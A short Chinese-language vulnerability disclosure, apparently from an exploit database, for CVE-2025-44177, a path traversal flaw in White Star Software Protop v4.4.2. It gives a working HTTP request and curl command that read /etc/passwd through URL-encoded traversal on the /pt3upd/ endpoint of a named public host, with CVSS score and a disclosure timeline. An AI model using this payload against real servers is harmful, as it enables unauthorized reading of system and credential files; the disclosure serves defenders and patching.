漏洞利用标题：White Star Software Protop 4.4.2-2024-11-27 - 本地文件包含(LFI)

日期：2025-07-09

漏洞利用作者：Imraan Khan (Lich-Sec)

厂商主页：https://wss.com/

软件链接：https://client.protop.co.za/

版本：v4.4.2-2024-11-27

测试环境：Ubuntu 22.04 / Linux

CVE：CVE-2025-44177

CWE：CWE-22 - 路径遍历

描述：

White Star Software Protop v4.4.2版本存在本地文件包含漏洞。

未经身份验证的远程攻击者可以通过在/pt3upd/端点中使用URL编码的遍历序列来检索任意文件。

易受攻击的端点：

GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: client.protop.co.za User-Agent: curl/8.0 Accept: /

示例curl命令：

curl -i ‘https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'

注意事项：

- 在测试时确认公共实例存在此漏洞

- CVSS v3.1基础评分：8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)

- 已通知厂商并发布了修复补丁

披露时间线：

- 发现时间：2025-03-13

- 向厂商披露：2025-03-20

- CVE分配：2025-07-01

- 公开披露：2025-07-09